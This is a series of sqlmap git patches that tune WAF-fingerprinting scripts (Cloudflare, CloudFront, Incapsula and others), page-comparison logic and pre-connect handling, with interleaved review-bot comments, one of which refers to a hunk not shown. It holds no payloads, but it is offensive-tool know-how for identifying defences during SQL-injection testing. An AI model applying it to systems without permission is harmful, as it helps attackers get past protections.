a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.27" +VERSION = "1.2.8.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
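Review bot: The rewritten `retval = ...` line in the kona.py hunk replaces the `Reference #[0-9a-f.]+` pattern with a bare `"Reference"` substring and silently drops the `re.I` flag, so the check is now both broader and case-sensitive. The other three strings ("Access Denied", "You don't have permission to access", "on this server") look like a generic Apache-style 403 body, which leaves "Reference" as the only vendor-specific token, and a plain word like that is easy to hit by accident. Keeping the reference-id pattern as the last condition stays narrow: `retval = code in (400, 403, 501) and all(_ in (page or "") for _ in ("Access Denied", "You don't have permission to access", "on this server")) and re.search(r"Reference #[0-9a-f.]+", page or "", re.I) is not None`. detect's body starts above the hunk.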
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0bc9adaace2..bad941e706a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe3bc1dc84fcdfc26e552984f6c4b139 lib/core/settings.py +676dac9284820f0949ec1f63e8827c4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -457,7 +457,7 @@ f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py 11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py -705ac8663513c12150cb5623ef4a04fb waf/zenedge.py +47f8f6623841232a93c5229d6c1bebfe waf/zenedge.py dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml diff --git a/waf/zenedge.py b/waf/zenedge.py index 82d367cfa31..b5b3e0fb39c 100644 --- a/waf/zenedge.py +++ b/waf/zenedge.py @@ -16,8 +16,9 @@ def detect(get_page): retval = False for vector in WAF_ATTACK_VECTORS: - _, headers, code = get_page(get=vector) + page, headers, code = get_page(get=vector) retval = code >= 400 and re.search(r"\AZENEDGE", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= all(_ in (page or "") for _ in ("Your request has been blocked", "Incident ID", "/__zenedge/assets/")) if retval: break From 014978cebccfd123490e2f59a546eea9e066da2f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:00:40 +0200 Subject: [PATCH 251/428] Fine tuning Cloudflare WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudflare.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) 
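Review bot: The new `retval |= all(...)` page check in the zenedge.py hunk is not gated on the status code, while the header check on the line above it requires `code >= 400`; a 2xx page that happens to quote the block text would now count as a WAF hit, and the asm.py and incapsula.py hunks later in this series add page checks with the same un-gated shape. The cloudflare.py hunk in the following commit puts all of its checks under `if code >= 400:`, so the scripts end up inconsistent with each other. If the un-gated form is deliberate because the strings are specific enough, a one-line comment such as `# body-only check: the block page may be served with a 2xx` would make that explicit; otherwise prefix the new condition with `code >= 400 and`. detect's body starts above the hunk.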
diff --git a/lib/core/settings.py b/lib/core/settings.py index bbd640edbf5..2e014209d7d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.28" +VERSION = "1.2.8.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bad941e706a..bb317f4b1aa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -676dac9284820f0949ec1f63e8827c4b lib/core/settings.py +06f18a0602e49a4b14f4096feea04e4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -feda0f2a5172325f39e8e3e38c45f73d waf/cloudflare.py +5987ef1e3f368f1f6cf5dad341db7159 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py diff --git a/waf/cloudflare.py b/waf/cloudflare.py index 7e738bb4726..c2e8cdf5524 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py 
@@ -17,12 +17,13 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None if code >= 400: + retval |= re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= headers.get("cf-ray") is not None retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None + retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) if retval: break From aefb815064c8019db98598e0ea05072f6365afe4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:02:27 +0200 Subject: [PATCH 252/428] Cutting down FP on Varnish WAF (ignoring Varnish Cache) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/varnish.py | 5 +---- 3 files changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e014209d7d..895005a8c51 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.29" +VERSION = "1.2.8.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb317f4b1aa..71f83400eea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
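Review bot: With the unconditional `retval = re.search(...)` line removed, nothing inside the loop assigns `retval` any more — every remaining statement is a `|=` and all of them sit under `if code >= 400:` — so the function now depends on an initialisation of `retval` above the hunk that is not visible here. The zenedge.py hunk in the previous commit shows `retval = False` before its loop, so cloudflare.py presumably has the same, but it is worth confirming since a missing initialiser would be a NameError on the first `|=`. A side effect of the change is that `retval` is no longer reset per vector; that is harmless only because the loop breaks on the first True, which a short comment like `# accumulated across vectors; loop exits on first hit` would record. detect's body starts above the hunk.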
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06f18a0602e49a4b14f4096feea04e4b lib/core/settings.py +b5062827268f92056e6f87e3e03df5f6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -449,7 +449,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py +ab329be0231efdd360ebabd24c0e5315 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/varnish.py b/waf/varnish.py index a1384d6eac2..62965755bdf 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -17,10 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = headers.get("X-Varnish") is not None - retval |= re.search(r"varnish\Z", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None - retval |= re.search(r"varnish", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= code == 404 and re.search(r"\bXID: \d+", page or "") is not None + retval = code == 404 and re.search(r"\bXID: \d+", page or "") is not None retval |= code >= 400 and "Request rejected by xVarnish-WAF" in (page or "") if retval: break From db327a85383132aefe2fc6f508f2a2470722b780 Mon Sep 17 00:00:00 2001 
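Review bot: After the three header-based lines are dropped from the varnish.py hunk, `headers` is unpacked by `page, headers, code = get_page(get=vector)` but never read in the visible body, and the `HTTP_HEADER` import at the top of the file (outside the hunk) is presumably unused now as well; rename the unpack to `page, _, code = get_page(get=vector)` as the other scripts in this series do, and drop the import if nothing else references it. The commit message explains why the header signals went away (plain Varnish Cache is not a WAF) but the code does not; a comment above the first `retval` line such as `# X-Varnish/Via/Server only prove Varnish Cache, not a WAF; match xVarnish-WAF block pages only` keeps that rationale from being lost. detect's body starts above the hunk.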
From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:19:31 +0200 Subject: [PATCH 253/428] Minor update of WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/asm.py | 1 + waf/cloudflare.py | 1 + 4 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 895005a8c51..5dd603c60ea 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.30" +VERSION = "1.2.8.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 71f83400eea..0047057a182 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b5062827268f92056e6f87e3e03df5f6 lib/core/settings.py +6f054fe13c3a24d17c82b35c96ca0ed0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -395,7 +395,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py -dec64f18c23962d279cc1cde6469afed waf/asm.py +2fe5335fde7a7f5b19d2f363a55ce805 waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py ef722d062564def381b1f96f5faadee3 waf/baidu.py 07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py 
@@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -5987ef1e3f368f1f6cf5dad341db7159 waf/cloudflare.py +94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py diff --git a/waf/asm.py b/waf/asm.py index 330579ad50b..9bfb31371c4 100644 --- a/waf/asm.py +++ b/waf/asm.py @@ -15,6 +15,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, _, _ = get_page(get=vector) retval = "The requested URL was rejected. Please consult with your administrator." in (page or "") + retval |= all(_ in (page or "") for _ in ("This page can't be displayed. Contact support for additional information", "The incident ID is:")) if retval: break diff --git a/waf/cloudflare.py b/waf/cloudflare.py index c2e8cdf5524..e38f48e291d 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -24,6 +24,7 @@ def detect(get_page): retval |= headers.get("cf-ray") is not None retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) + retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Sorry, you have been blocked")) if retval: break From dc01f2e77358d801d076c6cddf32670fdbc3ab8d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:42:35 +0200 Subject: [PATCH 254/428] Fine tuning of Cloudfrount WAF script (less FP) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudfront.py | 3 +-- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5dd603c60ea..24739a97840 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
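Review bot: In the cloudflare.py hunk the two consecutive `all(...)` checks both require `"Attention Required! | Cloudflare"` and differ only in the second string, so the pair collapses to one condition: `retval |= "Attention Required! | Cloudflare" in (page or "") and any(_ in (page or "") for _ in ("Please complete the security check to access", "Sorry, you have been blocked"))`. In the asm.py hunk the added line is fine as a signal, but like the existing line above it it runs with the status code discarded by `page, _, _ = get_page(get=vector)`, so a page that merely reproduces the block text would also match; if that is acceptable a one-line comment saying so would help the next reader. Both detect bodies start above their hunks.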
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.31" +VERSION = "1.2.8.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0047057a182..f8a7cf81bbd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6f054fe13c3a24d17c82b35c96ca0ed0 lib/core/settings.py +d4926186bd8f94eb38b5daf98f1cd67d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -405,7 +405,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py +8c8344b4f7e97c31f130f3d48da9b393 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py diff --git a/waf/cloudfront.py b/waf/cloudfront.py index 5969befe411..afc085e1e5f 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py 
@@ -18,8 +18,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: _, headers, _ = get_page(get=vector) - retval |= re.search(r"cloudfront", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= re.search(r"cloudfront", headers.get("X-Cache", ""), re.I) is not None + retval = re.search(r"Error from cloudfront", headers.get("X-Cache", ""), re.I) is not None retval |= headers.get("X-Amz-Cf-Id") is not None if retval: From 578c41f6deef721eb290c33cc6961db1f956dac7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 16:49:06 +0200 Subject: [PATCH 255/428] Fine tuning Incapsula WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/incapsula.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 24739a97840..d7e1f3538d0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.32" +VERSION = "1.2.8.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f8a7cf81bbd..8d83ff47fe7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d4926186bd8f94eb38b5daf98f1cd67d lib/core/settings.py +75a03c25cb625ee451394fea1fc4d7a6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
@@ -417,7 +417,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -51aed66945f95641cb45c840e7132e3b waf/incapsula.py +0359ca07b6e3ee0e4505ad5bfaa1de79 waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py diff --git a/waf/incapsula.py b/waf/incapsula.py index babf1d59ba6..c5e299057cb 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py @@ -19,7 +19,8 @@ def detect(get_page): page, headers, _ = get_page(get=vector) retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None - retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?")) + retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?", "?subject=WAF Block Page:")) + retval |= all(_ in (page or "") for _ in ("Application Firewall Error", "If you feel you have been blocked in error, please contact Customer Support")) retval |= headers.get("X-Iinfo") is not None if retval: break From a831865633ec1b0bbacfdb15dd173248e56d791a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 17:44:37 +0200 Subject: [PATCH 256/428] Further narrowing down cloudfront WAF script (less FP on detection) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudfront.py | 1 - 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d7e1f3538d0..00cad70c111 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.33" +VERSION = "1.2.8.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8d83ff47fe7..0718b14866b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -75a03c25cb625ee451394fea1fc4d7a6 lib/core/settings.py +11c6b10e7e997c019a0837d1de1f23c0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -405,7 +405,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -8c8344b4f7e97c31f130f3d48da9b393 waf/cloudfront.py +29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py diff --git a/waf/cloudfront.py b/waf/cloudfront.py index afc085e1e5f..d7ddc807ed4 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -19,7 +19,6 @@ def detect(get_page): _, headers, _ = get_page(get=vector) retval = re.search(r"Error from cloudfront", headers.get("X-Cache", ""), re.I) is not None - retval |= headers.get("X-Amz-Cf-Id") is not None if retval: break From 43c9e21c563d236d9c7d55d3147c7616f34cacb3 Mon Sep 17 00:00:00 2001 
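Review bot: With the `X-Amz-Cf-Id` line removed from the cloudfront.py hunk, `Error from cloudfront` in `X-Cache` is the only signal left, and that value appears on any error CloudFront serves — origin 5xx and missing-object 4xx responses included — while the status code is thrown away by `_, headers, _ = get_page(get=vector)`. WAF blocks in front of CloudFront are typically 403s, so unpacking `page, headers, code = get_page(get=vector)` and using `retval = code == 403 and re.search(r"Error from cloudfront", headers.get("X-Cache", ""), re.I) is not None` would cut the false positives this series is chasing further; please confirm against real block responses before relying on it. detect's body starts above the hunk.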
From: Miroslav Stampar Date: Tue, 4 Sep 2018 22:39:07 +0200 Subject: [PATCH 257/428] Performance improvement and reducing number of false-positives in heavily dynamic pages --- lib/core/settings.py | 2 +- lib/request/comparison.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 00cad70c111..bdac7948476 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.34" +VERSION = "1.2.9.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/comparison.py b/lib/request/comparison.py index bd8612d99dc..146150ac92c 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -137,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength): seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") + if kb.heavilyDynamic: + seq1 = seq1.split("\n") + seq2 = seq2.split("\n") + seqMatcher.set_seq1(seq1) seqMatcher.set_seq2(seq2) - ratio = round(seqMatcher.quick_ratio(), 3) + ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0718b14866b..65e05f8f69e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
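Review bot: Inside the new `if kb.heavilyDynamic:` branch of the comparison.py hunk, `seq1` and `seq2` are rebound from strings to lists of lines, and `_comparison` continues past the hunk; any later statement that still treats them as text (a character-count `len`, slicing, `.replace`) silently changes meaning in that mode and needs to be checked. `SequenceMatcher.ratio()` on the line lists is also the full quadratic algorithm that the `quick_ratio()` path avoids, presumably acceptable because a page has far fewer lines than characters, but a comment stating that trade-off would help. The selector reads more naturally without the double negative: `ratio = round(seqMatcher.ratio() if kb.heavilyDynamic else seqMatcher.quick_ratio(), 3)`.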
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -11c6b10e7e997c019a0837d1de1f23c0 lib/core/settings.py +bdb6b2b1b842c4f5e2874fe3a199f648 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -71,7 +71,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py -c0cabedead14b8a23353b606672cff42 lib/request/comparison.py +859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py From 12012b36b195d416db8a9ccd48fcbf0d3701db4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:01:17 +0200 Subject: [PATCH 258/428] Automatic disabling of socket-preconnect for known problematic server (SimpleHTTPServer) --- lib/controller/checks.py | 5 +++++ lib/core/option.py | 1 + lib/core/settings.py | 5 ++++- lib/request/connect.py | 1 + txt/checksum.md5 | 8 ++++---- 5 files changed, 15 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4d0bda2e02e..cff287cdaf5 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -88,6 +88,7 @@ from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH +from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS @@ -1554,6 +1555,10 @@ def checkConnection(suppressOutput=False): kb.errorIsNone = False + if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS): + singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader) + conf.disablePrecon = True + if not kb.originalPage and wasLastResponseHTTPError(): errMsg = "unable to retrieve page content" raise SqlmapConnectionException(errMsg) diff --git a/lib/core/option.py b/lib/core/option.py index 9e70fb8da9d..3241edf9ebb 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1852,6 +1852,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.safeCharEncode = False kb.safeReq = AttribDict() kb.secondReq = None + kb.serverHeader = None 